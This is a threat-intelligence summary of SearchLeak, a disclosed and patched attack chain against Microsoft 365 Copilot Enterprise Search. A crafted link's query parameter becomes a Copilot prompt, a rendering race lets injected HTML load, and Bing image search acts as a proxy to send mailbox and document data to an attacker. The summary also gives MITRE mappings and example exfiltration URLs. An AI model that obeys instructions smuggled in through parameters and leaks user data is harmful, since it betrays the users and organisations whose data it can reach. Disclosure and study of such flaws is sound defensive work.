Varonis Threat Labs discovered SearchLeak, a three-stage attack chain that turns Microsoft 365 Copilot Enterprise Search into a silent data exfiltration path by combining P2P injection, an HTML rendering race condition, and Bing-based SSRF. Microsoft patched the issue as CVE-2026-42824 with critical severity, and the chain could expose emails, security codes, calendar data, SharePoint documents, and OneDrive files with just a single click. #SearchLeak #Microsoft365CopilotEnterprise #CVE-2026-42824 #VaronisThreatLabs #Bing
Keypoints
- Varonis Threat Labs identified SearchLeak, a new attack chain against Microsoft 365 Copilot Enterprise Search.
- The chain combines three weaknesses: Parameter-to-Prompt (P2P) injection, an HTML rendering race condition, and SSRF through Bing.
- A victim only needs to click a crafted trusted-looking Microsoft link for the attack to begin.
- The attack can exfiltrate mailbox content, calendar data, SharePoint documents, OneDrive files, and other indexed organizational information.
- The exfiltration works because Copilot turns a URL parameter into an instruction, then renders attacker-controlled HTML before sanitization completes.
- Bing’s image search endpoint is abused as a server-side fetch proxy to bypass CSP restrictions and leak data to the attacker.
- Microsoft assigned the issue CVE-2026-42824 and rated it critical after remediation.
MITRE Techniques
- [T1059 ] Command and Scripting Interpreter – The attacker turns the URL parameter into executable instructions for Copilot, effectively using the prompt as a command channel. [‘the URL q parameter in Copilot Enterprise Search is passed directly to Copilot as an executable prompt’]
- [T1203 ] Exploitation for Client Execution – The victim’s browser executes attacker-influenced content after clicking the malicious link and rendering the injected HTML. [‘They click a link, and Copilot does the rest.’]
- [T1055 ] Process Injection – Not mentioned.
- [T1189 ] Drive-by Compromise – The attack begins when the victim clicks an unsuspicious trusted-domain link that silently triggers the exploit chain. [‘all from one click of an unsuspicious link’]
- [T1071.001 ] Web Protocols – The exfiltration occurs through browser and web requests to Bing and the attacker’s server over HTTP(S). [‘the browser renders it, and fires off an HTTP request to the src URL’]
- [T1190 ] Exploit Public-Facing Application – Copilot Enterprise Search and Bing’s public endpoints are abused as externally reachable services in the attack chain. [‘Bing’s image-search endpoint, allowlisted in the Content Security Policy, performs a server-side fetch’]
- [T1056.002 ] GUI Input Capture: GUI Clipboard Data – Not mentioned.
- [T1105 ] Ingress Tool Transfer – Not mentioned.
- [T1021 ] Remote Services – Not mentioned.
- [T1020 ] Data Exfiltration – The chain is explicitly designed to steal mailbox, calendar, and document content to the attacker’s server. [‘the data ends up on the attacker’s server’]
- [T1213 ] Data from Information Repositories – Copilot searches and exposes indexed organizational data from email, calendar, SharePoint, and OneDrive. [‘searches their mailbox, calendar, and indexed organizational content’]
- [T1185 ] Browser Session Hijacking – Not mentioned.
Indicators of Compromise
- [URL ] Attack and exfiltration links – https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=, https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
- [Domain ] Microsoft and Bing endpoints used in the chain – m365.cloud.microsoft, www.bing.com, and attacker.com
- [Path / Parameter Content ] Exfiltrated data in request path or embedded prompt – /Your_Security_Code_847291/img.png, $me=
- [CVE ] Tracked vulnerability identifier – CVE-2026-42824
- [Product / Service ] Affected platform and component – Microsoft 365 Copilot Enterprise Search, Copilot Personal, Bing Images
Read more: https://www.varonis.com/blog/searchleak